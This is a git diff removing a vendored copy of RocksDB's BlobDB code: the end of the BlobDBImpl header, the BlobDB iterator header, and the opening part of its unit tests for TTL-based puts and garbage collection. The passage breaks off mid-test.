-#include "db/db_iter.h"
-#include "rocksdb/compaction_filter.h"
-#include "rocksdb/db.h"
-#include "rocksdb/listener.h"
-#include "rocksdb/options.h"
-#include "rocksdb/wal_filter.h"
-#include "util/mpsc.h"
-#include "util/mutexlock.h"
-#include "util/timer_queue.h"
-#include "utilities/blob_db/blob_db.h"
-#include "utilities/blob_db/blob_file.h"
-#include "utilities/blob_db/blob_log_format.h"
-#include "utilities/blob_db/blob_log_reader.h"
-#include "utilities/blob_db/blob_log_writer.h"
-
-namespace rocksdb {
-
-class DBImpl;
-class ColumnFamilyHandle;
-class ColumnFamilyData;
-struct FlushJobInfo;
-
-namespace blob_db {
-
-class BlobFile;
-class BlobDBImpl;
-
-class BlobDBFlushBeginListener : public EventListener {
- public:
-  explicit BlobDBFlushBeginListener() : impl_(nullptr) {}
-
-  void OnFlushBegin(DB* db, const FlushJobInfo& info) override;
-
-  void SetImplPtr(BlobDBImpl* p) { impl_ = p; }
-
- protected:
-  BlobDBImpl* impl_;
-};
-
-// this implements the callback from the WAL which ensures that the
-// blob record is present in the blob log. If fsync/fdatasync in not
-// happening on every write, there is the probability that keys in the
-// blob log can lag the keys in blobs
-class BlobReconcileWalFilter : public WalFilter {
- public:
-  virtual WalFilter::WalProcessingOption LogRecordFound(
-      unsigned long long log_number, const std::string& log_file_name,
-      const WriteBatch& batch, WriteBatch* new_batch,
-      bool* batch_changed) override;
-
-  virtual const char* Name() const override { return "BlobDBWalReconciler"; }
-
-  void SetImplPtr(BlobDBImpl* p) { impl_ = p; }
-
- protected:
-  BlobDBImpl* impl_;
-};
-
-class EvictAllVersionsCompactionListener : public EventListener {
- public:
-  class InternalListener : public CompactionEventListener {
-    friend class BlobDBImpl;
-
-   public:
-    virtual void OnCompaction(int level, const Slice& key,
-                              CompactionListenerValueType value_type,
-                              const Slice& existing_value,
-                              const SequenceNumber& sn, bool is_new) override;
-
-    void SetImplPtr(BlobDBImpl* p) { impl_ = p; }
-
-   private:
-    BlobDBImpl* impl_;
-  };
-
-  explicit EvictAllVersionsCompactionListener()
-      : internal_listener_(new InternalListener()) {}
-
-  virtual CompactionEventListener* GetCompactionEventListener() override {
-    return internal_listener_.get();
-  }
-
-  void SetImplPtr(BlobDBImpl* p) { internal_listener_->SetImplPtr(p); }
-
- private:
-  std::unique_ptr<InternalListener> internal_listener_;
-};
-
-#if 0
-class EvictAllVersionsFilterFactory : public CompactionFilterFactory {
- private:
-  BlobDBImpl* impl_;
-
- public:
-  EvictAllVersionsFilterFactory() : impl_(nullptr) {}
-
-  void SetImplPtr(BlobDBImpl* p) { impl_ = p; }
-
-  virtual std::unique_ptr<CompactionFilter> CreateCompactionFilter(
-      const CompactionFilter::Context& context) override;
-
-  virtual const char* Name() const override {
-    return "EvictAllVersionsFilterFactory";
-  }
-};
-#endif
-
-// Comparator to sort "TTL" aware Blob files based on the lower value of
-// TTL range.
-struct blobf_compare_ttl {
-  bool operator()(const std::shared_ptr<BlobFile>& lhs,
-                  const std::shared_ptr<BlobFile>& rhs) const;
-};
-
-struct GCStats {
-  uint64_t blob_count = 0;
-  uint64_t num_deletes = 0;
-  uint64_t deleted_size = 0;
-  uint64_t retry_delete = 0;
-  uint64_t delete_succeeded = 0;
-  uint64_t overwritten_while_delete = 0;
-  uint64_t num_relocate = 0;
-  uint64_t retry_relocate = 0;
-  uint64_t relocate_succeeded = 0;
-  uint64_t overwritten_while_relocate = 0;
-  std::shared_ptr<BlobFile> newfile = nullptr;
-};
-
-/**
- * The implementation class for BlobDB. This manages the value
- * part in TTL aware sequentially written files. These files are
- * Garbage Collected.
- */
-class BlobDBImpl : public BlobDB {
-  friend class BlobDBFlushBeginListener;
-  friend class EvictAllVersionsCompactionListener;
-  friend class BlobDB;
-  friend class BlobFile;
-  friend class BlobDBIterator;
-
- public:
-  // deletions check period
-  static constexpr uint32_t kDeleteCheckPeriodMillisecs = 2 * 1000;
-
-  // gc percentage each check period
-  static constexpr uint32_t kGCFilePercentage = 100;
-
-  // gc period
-  static constexpr uint32_t kGCCheckPeriodMillisecs = 60 * 1000;
-
-  // sanity check task
-  static constexpr uint32_t kSanityCheckPeriodMillisecs = 20 * 60 * 1000;
-
-  // how many random access open files can we tolerate
-  static constexpr uint32_t kOpenFilesTrigger = 100;
-
-  // how many periods of stats do we keep.
-  static constexpr uint32_t kWriteAmplificationStatsPeriods = 24;
-
-  // what is the length of any period
-  static constexpr uint32_t kWriteAmplificationStatsPeriodMillisecs =
-      3600 * 1000;
-
-  // we will garbage collect blob files in
-  // which entire files have expired. However if the
-  // ttl_range of files is very large say a day, we
-  // would have to wait for the entire day, before we
-  // recover most of the space.
-  static constexpr uint32_t kPartialExpirationGCRangeSecs = 4 * 3600;
-
-  // this should be based on allowed Write Amplification
-  // if 50% of the space of a blob file has been deleted/expired,
-  static constexpr uint32_t kPartialExpirationPercentage = 75;
-
-  // how often should we schedule a job to fsync open files
-  static constexpr uint32_t kFSyncFilesPeriodMillisecs = 10 * 1000;
-
-  // how often to schedule reclaim open files.
-  static constexpr uint32_t kReclaimOpenFilesPeriodMillisecs = 1 * 1000;
-
-  // how often to schedule delete obs files periods
-  static constexpr uint32_t kDeleteObsoleteFilesPeriodMillisecs = 10 * 1000;
-
-  // how often to schedule check seq files period
-  static constexpr uint32_t kCheckSeqFilesPeriodMillisecs = 10 * 1000;
-
-  // when should oldest file be evicted:
-  // on reaching 90% of blob_dir_size
-  static constexpr double kEvictOldestFileAtSize = 0.9;
-
-  using BlobDB::Put;
-  Status Put(const WriteOptions& options, const Slice& key,
-             const Slice& value) override;
-
-  using BlobDB::Delete;
-  Status Delete(const WriteOptions& options, const Slice& key) override;
-
-  using BlobDB::Get;
-  Status Get(const ReadOptions& read_options, ColumnFamilyHandle* column_family,
-             const Slice& key, PinnableSlice* value) override;
-
-  using BlobDB::NewIterator;
-  virtual Iterator* NewIterator(const ReadOptions& read_options) override;
-
-  using BlobDB::NewIterators;
-  virtual Status NewIterators(
-      const ReadOptions& read_options,
-      const std::vector<ColumnFamilyHandle*>& column_families,
-      std::vector<Iterator*>* iterators) override {
-    return Status::NotSupported("Not implemented");
-  }
-
-  using BlobDB::MultiGet;
-  virtual std::vector<Status> MultiGet(
-      const ReadOptions& read_options,
-      const std::vector<Slice>& keys,
-      std::vector<std::string>* values) override;
-
-  virtual Status Write(const WriteOptions& opts, WriteBatch* updates) override;
-
-  virtual Status GetLiveFiles(std::vector<std::string>&,
-                              uint64_t* manifest_file_size,
-                              bool flush_memtable = true) override;
-  virtual void GetLiveFilesMetaData(
-      std::vector<LiveFileMetaData>* ) override;
-
-  using BlobDB::PutWithTTL;
-  Status PutWithTTL(const WriteOptions& options, const Slice& key,
-                    const Slice& value, uint64_t ttl) override;
-
-  using BlobDB::PutUntil;
-  Status PutUntil(const WriteOptions& options, const Slice& key,
-                  const Slice& value, uint64_t expiration) override;
-
-  Status LinkToBaseDB(DB* db) override;
-
-  BlobDBOptions GetBlobDBOptions() const override;
-
-  BlobDBImpl(DB* db, const BlobDBOptions& bdb_options);
-
-  BlobDBImpl(const std::string& dbname, const BlobDBOptions& bdb_options,
-             const DBOptions& db_options);
-
-  ~BlobDBImpl();
-
-#ifndef NDEBUG
-  Status TEST_GetBlobValue(const Slice& key, const Slice& index_entry,
-                           PinnableSlice* value);
-
-  std::vector<std::shared_ptr<BlobFile>> TEST_GetBlobFiles() const;
-
-  std::vector<std::shared_ptr<BlobFile>> TEST_GetObsoleteFiles() const;
-
-  Status TEST_CloseBlobFile(std::shared_ptr<BlobFile>& bfile);
-
-  Status TEST_GCFileAndUpdateLSM(std::shared_ptr<BlobFile>& bfile,
-                                 GCStats* gc_stats);
-
-  void TEST_RunGC();
-
-  void TEST_DeleteObsoleteFiles();
-#endif  //  !NDEBUG
-
- private:
-  class GarbageCollectionWriteCallback;
-  class BlobInserter;
-
-  Status OpenPhase1();
-
-  // Create a snapshot if there isn't one in read options.
-  // Return true if a snapshot is created.
-  bool SetSnapshotIfNeeded(ReadOptions* read_options);
-
-  Status GetBlobValue(const Slice& key, const Slice& index_entry,
-                      PinnableSlice* value);
-
-  Slice GetCompressedSlice(const Slice& raw,
-                           std::string* compression_output) const;
-
-  // Just before flush starts acting on memtable files,
-  // this handler is called.
-  void OnFlushBeginHandler(DB* db, const FlushJobInfo& info);
-
-  // is this file ready for Garbage collection. if the TTL of the file
-  // has expired or if threshold of the file has been evicted
-  // tt - current time
-  // last_id - the id of the non-TTL file to evict
-  bool ShouldGCFile(std::shared_ptr<BlobFile> bfile, uint64_t now,
-                    bool is_oldest_non_ttl_file, std::string* reason);
-
-  // collect all the blob log files from the blob directory
-  Status GetAllLogFiles(std::set<std::pair<uint64_t, std::string>>* file_nums);
-
-  // Close a file by appending a footer, and removes file from open files list.
-  Status CloseBlobFile(std::shared_ptr<BlobFile> bfile);
-
-  // Close a file if its size exceeds blob_file_size
-  Status CloseBlobFileIfNeeded(std::shared_ptr<BlobFile>& bfile);
-
-  uint64_t ExtractExpiration(const Slice& key, const Slice& value,
-                             Slice* value_slice, std::string* new_value);
-
-  Status PutBlobValue(const WriteOptions& options, const Slice& key,
-                      const Slice& value, uint64_t expiration,
-                      SequenceNumber sequence, WriteBatch* batch);
-
-  Status AppendBlob(const std::shared_ptr<BlobFile>& bfile,
-                    const std::string& headerbuf, const Slice& key,
-                    const Slice& value, uint64_t expiration,
-                    std::string* index_entry);
-
-  // find an existing blob log file based on the expiration unix epoch
-  // if such a file does not exist, return nullptr
-  std::shared_ptr<BlobFile> SelectBlobFileTTL(uint64_t expiration);
-
-  // find an existing blob log file to append the value to
-  std::shared_ptr<BlobFile> SelectBlobFile();
-
-  std::shared_ptr<BlobFile> FindBlobFileLocked(uint64_t expiration) const;
-
-  void Shutdown();
-
-  // periodic sanity check. Bunch of checks
-  std::pair<bool, int64_t> SanityCheck(bool aborted);
-
-  // delete files which have been garbage collected and marked
-  // obsolete. Check whether any snapshots exist which refer to
-  // the same
-  std::pair<bool, int64_t> DeleteObsoleteFiles(bool aborted);
-
-  // Major task to garbage collect expired and deleted blobs
-  std::pair<bool, int64_t> RunGC(bool aborted);
-
-  // asynchronous task to fsync/fdatasync the open blob files
-  std::pair<bool, int64_t> FsyncFiles(bool aborted);
-
-  // periodically check if open blob files and their TTL's has expired
-  // if expired, close the sequential writer and make the file immutable
-  std::pair<bool, int64_t> CheckSeqFiles(bool aborted);
-
-  // if the number of open files, approaches ULIMIT's this
-  // task will close random readers, which are kept around for
-  // efficiency
-  std::pair<bool, int64_t> ReclaimOpenFiles(bool aborted);
-
-  // periodically print write amplification statistics
-  std::pair<bool, int64_t> WaStats(bool aborted);
-
-  // background task to do book-keeping of deleted keys
-  std::pair<bool, int64_t> EvictDeletions(bool aborted);
-
-  std::pair<bool, int64_t> EvictCompacted(bool aborted);
-
-  std::pair<bool, int64_t> RemoveTimerQ(TimerQueue* tq, bool aborted);
-
-  // Adds the background tasks to the timer queue
-  void StartBackgroundTasks();
-
-  // add a new Blob File
-  std::shared_ptr<BlobFile> NewBlobFile(const std::string& reason);
-
-  Status OpenAllFiles();
-
-  // hold write mutex on file and call
-  // creates a Random Access reader for GET call
-  std::shared_ptr<RandomAccessFileReader> GetOrOpenRandomAccessReader(
-      const std::shared_ptr<BlobFile>& bfile, Env* env,
-      const EnvOptions& env_options);
-
-  // hold write mutex on file and call.
-  // Close the above Random Access reader
-  void CloseRandomAccessLocked(const std::shared_ptr<BlobFile>& bfile);
-
-  // hold write mutex on file and call
-  // creates a sequential (append) writer for this blobfile
-  Status CreateWriterLocked(const std::shared_ptr<BlobFile>& bfile);
-
-  // returns a Writer object for the file. If writer is not
-  // already present, creates one. Needs Write Mutex to be held
-  std::shared_ptr<Writer> CheckOrCreateWriterLocked(
-      const std::shared_ptr<BlobFile>& bfile);
-
-  // Iterate through keys and values on Blob and write into
-  // separate file the remaining blobs and delete/update pointers
-  // in LSM atomically
-  Status GCFileAndUpdateLSM(const std::shared_ptr<BlobFile>& bfptr,
-                            GCStats* gcstats);
-
-  // checks if there is no snapshot which is referencing the
-  // blobs
-  bool VisibleToActiveSnapshot(const std::shared_ptr<BlobFile>& file);
-  bool FileDeleteOk_SnapshotCheckLocked(const std::shared_ptr<BlobFile>& bfile);
-
-  bool MarkBlobDeleted(const Slice& key, const Slice& lsmValue);
-
-  bool FindFileAndEvictABlob(uint64_t file_number, uint64_t key_size,
-                             uint64_t blob_offset, uint64_t blob_size);
-
-  void CopyBlobFiles(
-      std::vector<std::shared_ptr<BlobFile>>* bfiles_copy,
-      std::function<bool(const std::shared_ptr<BlobFile>&)> predicate = {});
-
-  void FilterSubsetOfFiles(
-      const std::vector<std::shared_ptr<BlobFile>>& blob_files,
-      std::vector<std::shared_ptr<BlobFile>>* to_process, uint64_t epoch,
-      size_t files_to_collect);
-
-  uint64_t EpochNow() { return env_->NowMicros() / 1000000; }
-
-  Status CheckSize(size_t blob_size);
-
-  std::shared_ptr<BlobFile> GetOldestBlobFile();
-
-  bool EvictOldestBlobFile();
-
-  // the base DB
-  DBImpl* db_impl_;
-  Env* env_;
-  TTLExtractor* ttl_extractor_;
-
-  // the options that govern the behavior of Blob Storage
-  BlobDBOptions bdb_options_;
-  DBOptions db_options_;
-  EnvOptions env_options_;
-
-  // name of the database directory
-  std::string dbname_;
-
-  // by default this is "blob_dir" under dbname_
-  // but can be configured
-  std::string blob_dir_;
-
-  // pointer to directory
-  std::unique_ptr<Directory> dir_ent_;
-
-  std::atomic<bool> dir_change_;
-
-  // Read Write Mutex, which protects all the data structures
-  // HEAVILY TRAFFICKED
-  mutable port::RWMutex mutex_;
-
-  // Writers has to hold write_mutex_ before writing.
-  mutable port::Mutex write_mutex_;
-
-  // counter for blob file number
-  std::atomic<uint64_t> next_file_number_;
-
-  // entire metadata of all the BLOB files memory
-  std::map<uint64_t, std::shared_ptr<BlobFile>> blob_files_;
-
-  // epoch or version of the open files.
-  std::atomic<uint64_t> epoch_of_;
-
-  // opened non-TTL blob file.
-  std::shared_ptr<BlobFile> open_non_ttl_file_;
-
-  // all the blob files which are currently being appended to based
-  // on variety of incoming TTL's
-  std::multiset<std::shared_ptr<BlobFile>, blobf_compare_ttl> open_ttl_files_;
-
-  // packet of information to put in lockess delete(s) queue
-  struct delete_packet_t {
-    ColumnFamilyHandle* cfh_;
-    std::string key_;
-    SequenceNumber dsn_;
-  };
-
-  struct override_packet_t {
-    uint64_t file_number_;
-    uint64_t key_size_;
-    uint64_t blob_offset_;
-    uint64_t blob_size_;
-    SequenceNumber dsn_;
-  };
-
-  // LOCKLESS multiple producer single consumer queue to quickly append
-  // deletes without taking lock. Can rapidly grow in size!!
-  // deletes happen in LSM, but minor book-keeping needs to happen on
-  // BLOB side (for triggering eviction)
-  mpsc_queue_t<delete_packet_t> delete_keys_q_;
-
-  // LOCKLESS multiple producer single consumer queue for values
-  // that are being compacted
-  mpsc_queue_t<override_packet_t> override_vals_q_;
-
-  // atomic bool to represent shutdown
-  std::atomic<bool> shutdown_;
-
-  // timer based queue to execute tasks
-  TimerQueue tqueue_;
-
-  // only accessed in GC thread, hence not atomic. The epoch of the
-  // GC task. Each execution is one epoch. Helps us in allocating
-  // files to one execution
-  uint64_t current_epoch_;
-
-  // number of files opened for random access/GET
-  // counter is used to monitor and close excess RA files.
-  std::atomic<uint32_t> open_file_count_;
-
-  // should hold mutex to modify
-  // STATISTICS for WA of Blob Files due to GC
-  // collect by default 24 hourly periods
-  std::list<uint64_t> all_periods_write_;
-  std::list<uint64_t> all_periods_ampl_;
-
-  std::atomic<uint64_t> last_period_write_;
-  std::atomic<uint64_t> last_period_ampl_;
-
-  uint64_t total_periods_write_;
-  uint64_t total_periods_ampl_;
-
-  // total size of all blob files at a given time
-  std::atomic<uint64_t> total_blob_space_;
-  std::list<std::shared_ptr<BlobFile>> obsolete_files_;
-  bool open_p1_done_;
-
-  uint32_t debug_level_;
-
-  std::atomic<bool> oldest_file_evicted_;
-};
-
-}  // namespace blob_db
-}  // namespace rocksdb
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/utilities/blob_db/blob_db_iterator.h b/thirdparty/rocksdb/utilities/blob_db/blob_db_iterator.h
deleted file mode 100644
index c8aa1ff..0000000
--- a/thirdparty/rocksdb/utilities/blob_db/blob_db_iterator.h
+++ /dev/null
@@ -1,104 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#pragma once
-#ifndef ROCKSDB_LITE
-
-#include "rocksdb/iterator.h"
-#include "utilities/blob_db/blob_db_impl.h"
-
-namespace rocksdb {
-namespace blob_db {
-
-using rocksdb::ManagedSnapshot;
-
-class BlobDBIterator : public Iterator {
- public:
-  BlobDBIterator(ManagedSnapshot* snapshot, ArenaWrappedDBIter* iter,
-                 BlobDBImpl* blob_db)
-      : snapshot_(snapshot), iter_(iter), blob_db_(blob_db) {}
-
-  virtual ~BlobDBIterator() = default;
-
-  bool Valid() const override {
-    if (!iter_->Valid()) {
-      return false;
-    }
-    return status_.ok();
-  }
-
-  Status status() const override {
-    if (!iter_->status().ok()) {
-      return iter_->status();
-    }
-    return status_;
-  }
-
-  void SeekToFirst() override {
-    iter_->SeekToFirst();
-    UpdateBlobValue();
-  }
-
-  void SeekToLast() override {
-    iter_->SeekToLast();
-    UpdateBlobValue();
-  }
-
-  void Seek(const Slice& target) override {
-    iter_->Seek(target);
-    UpdateBlobValue();
-  }
-
-  void SeekForPrev(const Slice& target) override {
-    iter_->SeekForPrev(target);
-    UpdateBlobValue();
-  }
-
-  void Next() override {
-    assert(Valid());
-    iter_->Next();
-    UpdateBlobValue();
-  }
-
-  void Prev() override {
-    assert(Valid());
-    iter_->Prev();
-    UpdateBlobValue();
-  }
-
-  Slice key() const override {
-    assert(Valid());
-    return iter_->key();
-  }
-
-  Slice value() const override {
-    assert(Valid());
-    if (!iter_->IsBlob()) {
-      return iter_->value();
-    }
-    return value_;
-  }
-
-  // Iterator::Refresh() not supported.
-
- private:
-  void UpdateBlobValue() {
-    TEST_SYNC_POINT("BlobDBIterator::UpdateBlobValue:Start:1");
-    TEST_SYNC_POINT("BlobDBIterator::UpdateBlobValue:Start:2");
-    value_.Reset();
-    if (iter_->Valid() && iter_->IsBlob()) {
-      status_ = blob_db_->GetBlobValue(iter_->key(), iter_->value(), &value_);
-    }
-  }
-
-  std::unique_ptr<ManagedSnapshot> snapshot_;
-  std::unique_ptr<ArenaWrappedDBIter> iter_;
-  BlobDBImpl* blob_db_;
-  Status status_;
-  PinnableSlice value_;
-};
-}  // namespace blob_db
-}  // namespace rocksdb
-#endif  // !ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/utilities/blob_db/blob_db_test.cc b/thirdparty/rocksdb/utilities/blob_db/blob_db_test.cc
deleted file mode 100644
index 03396ee..0000000
--- a/thirdparty/rocksdb/utilities/blob_db/blob_db_test.cc
+++ /dev/null
@@ -1,1279 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#ifndef ROCKSDB_LITE
-
-#include <algorithm>
-#include <cstdlib>
-#include <map>
-#include <memory>
-#include <string>
-#include <vector>
-
-#include "db/db_test_util.h"
-#include "port/port.h"
-#include "rocksdb/utilities/debug.h"
-#include "util/cast_util.h"
-#include "util/random.h"
-#include "util/string_util.h"
-#include "util/sync_point.h"
-#include "util/testharness.h"
-#include "utilities/blob_db/blob_db.h"
-#include "utilities/blob_db/blob_db_impl.h"
-#include "utilities/blob_db/blob_index.h"
-
-namespace rocksdb {
-namespace blob_db {
-
-class BlobDBTest : public testing::Test {
- public:
-  const int kMaxBlobSize = 1 << 14;
-
-  struct BlobRecord {
-    std::string key;
-    std::string value;
-    uint64_t expiration = 0;
-  };
-
-  BlobDBTest()
-      : dbname_(test::TmpDir() + "/blob_db_test"),
-        mock_env_(new MockTimeEnv(Env::Default())),
-        blob_db_(nullptr) {
-    Status s = DestroyBlobDB(dbname_, Options(), BlobDBOptions());
-    assert(s.ok());
-  }
-
-  ~BlobDBTest() { Destroy(); }
-
-  Status TryOpen(BlobDBOptions bdb_options = BlobDBOptions(),
-                 Options options = Options()) {
-    options.create_if_missing = true;
-    return BlobDB::Open(options, bdb_options, dbname_, &blob_db_);
-  }
-
-  void Open(BlobDBOptions bdb_options = BlobDBOptions(),
-            Options options = Options()) {
-    ASSERT_OK(TryOpen(bdb_options, options));
-  }
-
-  void Reopen(BlobDBOptions bdb_options = BlobDBOptions(),
-              Options options = Options()) {
-    assert(blob_db_ != nullptr);
-    delete blob_db_;
-    blob_db_ = nullptr;
-    Open(bdb_options, options);
-  }
-
-  void Destroy() {
-    if (blob_db_) {
-      Options options = blob_db_->GetOptions();
-      BlobDBOptions bdb_options = blob_db_->GetBlobDBOptions();
-      delete blob_db_;
-      ASSERT_OK(DestroyBlobDB(dbname_, options, bdb_options));
-      blob_db_ = nullptr;
-    }
-  }
-
-  BlobDBImpl *blob_db_impl() {
-    return reinterpret_cast<BlobDBImpl *>(blob_db_);
-  }
-
-  Status Put(const Slice &key, const Slice &value) {
-    return blob_db_->Put(WriteOptions(), key, value);
-  }
-
-  void Delete(const std::string &key,
-              std::map<std::string, std::string> *data = nullptr) {
-    ASSERT_OK(blob_db_->Delete(WriteOptions(), key));
-    if (data != nullptr) {
-      data->erase(key);
-    }
-  }
-
-  Status PutUntil(const Slice &key, const Slice &value, uint64_t expiration) {
-    return blob_db_->PutUntil(WriteOptions(), key, value, expiration);
-  }
-
-  void PutRandomWithTTL(const std::string &key, uint64_t ttl, Random *rnd,
-                        std::map<std::string, std::string> *data = nullptr) {
-    int len = rnd->Next() % kMaxBlobSize + 1;
-    std::string value = test::RandomHumanReadableString(rnd, len);
-    ASSERT_OK(
-        blob_db_->PutWithTTL(WriteOptions(), Slice(key), Slice(value), ttl));
-    if (data != nullptr) {
-      (*data)[key] = value;
-    }
-  }
-
-  void PutRandomUntil(const std::string &key, uint64_t expiration, Random *rnd,
-                      std::map<std::string, std::string> *data = nullptr) {
-    int len = rnd->Next() % kMaxBlobSize + 1;
-    std::string value = test::RandomHumanReadableString(rnd, len);
-    ASSERT_OK(blob_db_->PutUntil(WriteOptions(), Slice(key), Slice(value),
-                                 expiration));
-    if (data != nullptr) {
-      (*data)[key] = value;
-    }
-  }
-
-  void PutRandom(const std::string &key, Random *rnd,
-                 std::map<std::string, std::string> *data = nullptr) {
-    PutRandom(blob_db_, key, rnd, data);
-  }
-
-  void PutRandom(DB *db, const std::string &key, Random *rnd,
-                 std::map<std::string, std::string> *data = nullptr) {
-    int len = rnd->Next() % kMaxBlobSize + 1;
-    std::string value = test::RandomHumanReadableString(rnd, len);
-    ASSERT_OK(db->Put(WriteOptions(), Slice(key), Slice(value)));
-    if (data != nullptr) {
-      (*data)[key] = value;
-    }
-  }
-
-  void PutRandomToWriteBatch(
-      const std::string &key, Random *rnd, WriteBatch *batch,
-      std::map<std::string, std::string> *data = nullptr) {
-    int len = rnd->Next() % kMaxBlobSize + 1;
-    std::string value = test::RandomHumanReadableString(rnd, len);
-    ASSERT_OK(batch->Put(key, value));
-    if (data != nullptr) {
-      (*data)[key] = value;
-    }
-  }
-
-  // Verify blob db contain expected data and nothing more.
-  void VerifyDB(const std::map<std::string, std::string> &data) {
-    VerifyDB(blob_db_, data);
-  }
-
-  void VerifyDB(DB *db, const std::map<std::string, std::string> &data) {
-    // Verify normal Get
-    auto* cfh = db->DefaultColumnFamily();
-    for (auto &p : data) {
-      PinnableSlice value_slice;
-      ASSERT_OK(db->Get(ReadOptions(), cfh, p.first, &value_slice));
-      ASSERT_EQ(p.second, value_slice.ToString());
-      std::string value;
-      ASSERT_OK(db->Get(ReadOptions(), cfh, p.first, &value));
-      ASSERT_EQ(p.second, value);
-    }
-
-    // Verify iterators
-    Iterator *iter = db->NewIterator(ReadOptions());
-    iter->SeekToFirst();
-    for (auto &p : data) {
-      ASSERT_TRUE(iter->Valid());
-      ASSERT_EQ(p.first, iter->key().ToString());
-      ASSERT_EQ(p.second, iter->value().ToString());
-      iter->Next();
-    }
-    ASSERT_FALSE(iter->Valid());
-    ASSERT_OK(iter->status());
-    delete iter;
-  }
-
-  void VerifyBaseDB(
-      const std::map<std::string, KeyVersion> &expected_versions) {
-    auto *bdb_impl = static_cast<BlobDBImpl *>(blob_db_);
-    DB *db = blob_db_->GetRootDB();
-    std::vector<KeyVersion> versions;
-    GetAllKeyVersions(db, "", "", &versions);
-    ASSERT_EQ(expected_versions.size(), versions.size());
-    size_t i = 0;
-    for (auto &key_version : expected_versions) {
-      const KeyVersion &expected_version = key_version.second;
-      ASSERT_EQ(expected_version.user_key, versions[i].user_key);
-      ASSERT_EQ(expected_version.sequence, versions[i].sequence);
-      ASSERT_EQ(expected_version.type, versions[i].type);
-      if (versions[i].type == kTypeValue) {
-        ASSERT_EQ(expected_version.value, versions[i].value);
-      } else {
-        ASSERT_EQ(kTypeBlobIndex, versions[i].type);
-        PinnableSlice value;
-        ASSERT_OK(bdb_impl->TEST_GetBlobValue(versions[i].user_key,
-                                              versions[i].value, &value));
-        ASSERT_EQ(expected_version.value, value.ToString());
-      }
-      i++;
-    }
-  }
-
-  void InsertBlobs() {
-    WriteOptions wo;
-    std::string value;
-
-    Random rnd(301);
-    for (size_t i = 0; i < 100000; i++) {
-      uint64_t ttl = rnd.Next() % 86400;
-      PutRandomWithTTL("key" + ToString(i % 500), ttl, &rnd, nullptr);
-    }
-
-    for (size_t i = 0; i < 10; i++) {
-      Delete("key" + ToString(i % 500));
-    }
-  }
-
-  const std::string dbname_;
-  std::unique_ptr<MockTimeEnv> mock_env_;
-  std::shared_ptr<TTLExtractor> ttl_extractor_;
-  BlobDB *blob_db_;
-};  // class BlobDBTest
-
-TEST_F(BlobDBTest, Put) {
-  Random rnd(301);
-  BlobDBOptions bdb_options;
-  bdb_options.min_blob_size = 0;
-  bdb_options.disable_background_tasks = true;
-  Open(bdb_options);
-  std::map<std::string, std::string> data;
-  for (size_t i = 0; i < 100; i++) {
-    PutRandom("key" + ToString(i), &rnd, &data);
-  }
-  VerifyDB(data);
-}
-
-TEST_F(BlobDBTest, PutWithTTL) {
-  Random rnd(301);
-  Options options;
-  options.env = mock_env_.get();
-  BlobDBOptions bdb_options;
-  bdb_options.ttl_range_secs = 1000;
-  bdb_options.min_blob_size = 0;
-  bdb_options.blob_file_size = 256 * 1000 * 1000;
-  bdb_options.disable_background_tasks = true;
-  Open(bdb_options, options);
-  std::map<std::string, std::string> data;
-  mock_env_->set_current_time(50);
-  for (size_t i = 0; i < 100; i++) {
-    uint64_t ttl = rnd.Next() % 100;
-    PutRandomWithTTL("key" + ToString(i), ttl, &rnd,
-                     (ttl <= 50 ? nullptr : &data));
-  }
-  mock_env_->set_current_time(100);
-  auto *bdb_impl = static_cast<BlobDBImpl *>(blob_db_);
-  auto blob_files = bdb_impl->TEST_GetBlobFiles();
-  ASSERT_EQ(1, blob_files.size());
-  ASSERT_TRUE(blob_files[0]->HasTTL());
-  ASSERT_OK(bdb_impl->TEST_CloseBlobFile(blob_files[0]));
-  GCStats gc_stats;
-  ASSERT_OK(bdb_impl->TEST_GCFileAndUpdateLSM(blob_files[0], &gc_stats));
-  ASSERT_EQ(100 - data.size(), gc_stats.num_deletes);
-  ASSERT_EQ(data.size(), gc_stats.num_relocate);
-  VerifyDB(data);
-}
-
-TEST_F(BlobDBTest, PutUntil) {
-  Random rnd(301);
-  Options options;
-  options.env = mock_env_.get();
-  BlobDBOptions bdb_options;
-  bdb_options.ttl_range_secs = 1000;
-  bdb_options.min_blob_size = 0;
-  bdb_options.blob_file_size = 256 * 1000 * 1000;
-  bdb_options.disable_background_tasks = true;
-  Open(bdb_options, options);
-  std::map<std::string, std::string> data;
-  mock_env_->set_current_time(50);
-  for (size_t i = 0; i < 100; i++) {
-    uint64_t expiration = rnd.Next() % 100 + 50;
-    PutRandomUntil("key" + ToString(i), expiration, &rnd,
-                   (expiration <= 100 ? nullptr : &data));
-  }
-  mock_env_->set_current_time(100);
-  auto *bdb_impl = static_cast<BlobDBImpl *>(blob_db_);
-  auto blob_files = bdb_impl->TEST_GetBlobFiles();
-  ASSERT_EQ(1, blob_files.size());
-  ASSERT_TRUE(blob_files[0]->HasTTL());
-  ASSERT_OK(bdb_impl->TEST_CloseBlobFile(blob_files[0]));
-  GCStats gc_stats;
-  ASSERT_OK(bdb_impl->TEST_GCFileAndUpdateLSM(blob_files[0], &gc_stats));
-  ASSERT_EQ(100 - data.size(), gc_stats.num_deletes);
-  ASSERT_EQ(data.size(), gc_stats.num_relocate);
-  VerifyDB(data);
-}
-
-TEST_F(BlobDBTest, TTLExtrator_NoTTL) {
-  // The default ttl extractor return no ttl for every key.
-  ttl_extractor_.reset(new TTLExtractor());
-  Random rnd(301);
-  Options options;
-  options.env = mock_env_.get();
-  BlobDBOptions bdb_options;
-  bdb_options.ttl_range_secs = 1000;
-  bdb_options.min_blob_size = 0;
-  bdb_options.blob_file_size = 256 * 1000 * 1000;
-  bdb_options.ttl_extractor = ttl_extractor_;
-  bdb_options.disable_background_tasks = true;
-  Open(bdb_options, options);
-  std::map<std::string, std::string> data;
-  mock_env_->set_current_time(0);
-  for (size_t i = 0; i < 100; i++) {
-    PutRandom("key" + ToString(i), &rnd, &data);
-  }
-  // very far in the future..
-  mock_env_->set_current_time(std::numeric_limits<uint64_t>::max() / 1000000 -
-                              10);
